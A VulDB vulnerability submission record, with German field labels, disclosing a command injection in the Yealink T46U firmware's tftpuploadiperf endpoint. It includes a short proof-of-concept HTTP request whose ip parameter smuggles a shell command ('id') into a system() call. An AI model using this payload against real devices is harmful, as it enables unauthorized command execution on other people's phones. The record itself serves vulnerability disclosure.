| Titel | yealink T46U 108.86.0.118 Command Injection |
|---|
| Beschreibung | Yealink T46U phone firmware `x.x.x.x` contains a command injection vulnerability and a stack buffer overflow vulnerability in the Web FastCGI service `fcgiserver`. The vulnerable endpoint is:
```text
POST /api/inner/tftpuploadiperf
```
This endpoint is handled by `mod_webd.TFTPUploadIperf()`. The handler receives the `ip` and `port` parameters from the HTTP request and concatenates them directly into a shell command using `sprintf()`. No handler-local validation, escaping, or length check is applied before the command is passed to `system()`.
poc
POST /api/inner/tftpuploadiperf?p=Setting&t=<timestamp> HTTP/1.1
Host: <target>
Cookie: JSESSIONID=<valid-session>
X-Csrftoken: <valid-token>
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
ip=127.0.0.1;id>/tmp/tftpuploadiperf_poc&port=69 |
|---|
| Quelle | ⚠️ http://cdn2.v50to.cc/T46U/T46U_mod_webd_TFTPUploadIperf_system_exec.zip |
|---|
| Benutzer | ChiChen241 (UID 98424) |
|---|
| Einreichung | 21.05.2026 04:57 (vor 26 Tagen) |
|---|
| Moderieren | 14.06.2026 15:54 (24 days later) |
|---|
| Status | Akzeptiert |
|---|
| VulDB Eintrag | 370866 [Yealink SIP-T46U 108.86.0.118 Web FastCGI Service tftpuploadiperf mod_webd.TFTPUploadIperf ip/port erweiterte Rechte] |
|---|
| Punkte | 20 |
|---|